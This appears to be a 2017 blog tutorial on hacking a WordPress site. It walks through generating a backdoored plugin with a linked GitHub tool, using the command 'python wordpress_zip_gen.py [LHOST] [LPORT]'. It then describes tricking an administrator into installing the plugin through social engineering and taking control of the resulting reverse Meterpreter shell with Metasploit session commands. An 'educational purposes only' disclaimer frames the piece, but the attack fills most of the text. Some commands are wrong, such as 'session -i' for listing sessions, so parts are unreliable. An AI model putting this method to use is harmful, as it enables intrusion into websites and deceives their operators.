Hack WordPress Website with Malicious Plug-in. The threats of unknown plugins from websites and social engineering. Tutorial for educational purposes only

Hack WordPress Website with Malicious Plug-in 2017

It's only fair to share...Digg thisShare on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInFlattr the authorShare on TumblrShare on VKShare on YummlyShare on RedditShare on StumbleUpon

Hack WordPress Website with Malicious Plug-in 2017

 

Hack WordPress Website with Malicious Plug-in 2017.  In computing, a plug-in (or plugin, add-in, addin, add-on, addon, or extension) is a software component that adds a specific feature to an existing computer program. When a program supports plug-ins, it enables customization. The common examples are the plug-ins used in web browsers to add new features such as search-engines, virus scanners, or the ability to use a new file type such as a new video format. Well-known browser plug-ins include the Adobe Flash Player, the QuickTime Player, and the Java plug-in, which can launch a user-activatedJava applet on a web page to its execution on a local Java virtual machine.

 

Applications support plug-ins for many reasons. Some of the main reasons include:

  • to enable third-party developers to create abilities which extend an application
  • and to support easily adding new features
  • Also, to reduce the size of an application
  • to separate source code from an application because of incompatible software licenses.

Welcome back today we will talk about how we could compromise a WordPress website for a reverse meterpreter shell though use of malicious WordPress addons.

This will allow us to create a malicious WordPress plugin to use as a payload and achieve a reverse shell back to the attacking machine.

Hack WordPress Website with Malicious Plug-in 2017

Requirements:
Linux
Python
Metasploit
malicious-wordpress-plugin

This tutorial is to show the threats of unknown plugins from rouge websites and social engineering methods. This tutorial is for educational purposes only the author of this guide will not be held responsible for misuse of this information.

ALSO READ  How Easy Hackers Really Crack Your Passwords

First we will prepare malicious-wordpress-plugin this will allow us to generate a malicious WordPress plugin.

DOWNLOAD MALICIOUS-WORDPRESS-PLUGIN GENERATOR

https://github.com/wetw0rk/malicious-wordpress-plugin

Open up a new terminal and navigate to directory for malicious-wordpress-plugin script.

You will now see the contents of the directory. Hack WordPress Website with Malicious Plug-in 2017

In a terminal navigate to the script directory and execute WordPress Zip Gen.

Use the following command to execute wordpress_zip_gen.py script.

python wordpress_zip_gen.py

So that we can establish a reverse connection we will first need to know our what our local IP address is. We can find this by typing “ifconfig” from a terminal your LHOST will be found under inet.

Hack WordPress Website with Malicious Plug-in 2017

Usage:

python wordpress_zip_gen.py [LHOST] [LPORT]

Example:

 python wordpress_zip_gen.py 192.168.43.49 443

wordpress_zip_gen will now generate a malicious WordPress addon and output it to the script directory.


This attack will require a little social engineering/trickery to deliver the payload.

The malicious WordPress Plugin can be named what ever your like.

Upload the malicious WordPress Plugin to the WordPress test environment & active Plugin. Hack WordPress Website with Malicious Plug-in 2017

After the Admin or site operator installs the malicious WordPress Plugin you should now have established a reverse connection back to the attacking machine via a meterpreter shell.

To check if your shell sessions has been successful you can list established sessions using commands.

Listing sessions:
session -i

Connecting to a session:
session -i 1

Once a remote connection is established between the WordPress website and the attacking machine we can then use “help” command to list available operations. This will allow us to list exploits available for the target web server. We have now come to the end of this guide if you enjoyed this tutorial consider liking and sharing it on Social media thanks.

ALSO READ  WordPress launched public bug bounty program

It's only fair to share...Digg thisShare on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInFlattr the authorShare on TumblrShare on VKShare on YummlyShare on RedditShare on StumbleUpon